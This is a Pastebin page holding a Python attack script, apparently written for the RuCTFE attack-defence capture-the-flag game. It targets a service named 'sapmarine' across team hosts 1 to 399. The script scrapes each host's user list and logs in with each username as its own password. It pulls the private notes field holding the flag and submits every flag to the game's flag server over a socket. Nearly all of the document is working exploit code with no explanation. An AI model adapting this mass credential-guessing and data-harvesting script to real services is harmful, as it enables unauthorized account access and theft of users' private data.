Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import threading
- import socket
- import requests
- from lxml import html
- from bs4 import BeautifulSoup
- task = 'http://sapmarine.'
- suf = 'team'
- pref = '.ructfe.org'
- loginForm = '/loginForm'
- profileForm = '/profileForm'
- class Sapmarine(threading.Thread):
- def run(self):
- pass
- def get_html(url):
- return requests.get(url).content
- def get_user_list(url):
- soup = BeautifulSoup(get_html(url), 'lxml')
- users = []
- for user in soup.find_all('table')[1].find_all('tr'):
- users.append(str(list(user)[1])[4:-5])
- return users[1:]
- def get_flag(html):
- soup = BeautifulSoup(html, 'lxml')
- form = soup.find('form')
- try:
- for line in form.find_all('div'):
- fr = line.find('input')
- if fr['placeholder'] == 'Private Notes':
- return fr['value']
- except AttributeError:
- pass
- def perform(user, url_login, url_get):
- # print(url_login + '?user={}&pass={}'.format(user, user))
- req = requests.session()
- req.get(url_login + '?user={}&pass={}'.format(user, user))
- resp = req.get(url_get)
- return get_flag(resp.content)
- def logout(url):
- return requests.get(url)
- if __name__ == '__main__':
- for num in range(1, 400):
- url = task + suf + str(num) + pref
- users = get_user_list(url)
- for user in users:
- # user = 'brigida3e3b'
- flag = perform(user, url + '/login', url + profileForm)
- if flag != '' and flag is not None:
- sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- sock.connect(('flags.ructfe.org', 31337))
- # sock.recv(200)
- sock.send((flag + '\n').encode('utf8'))
- print(sock.recv(200))
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement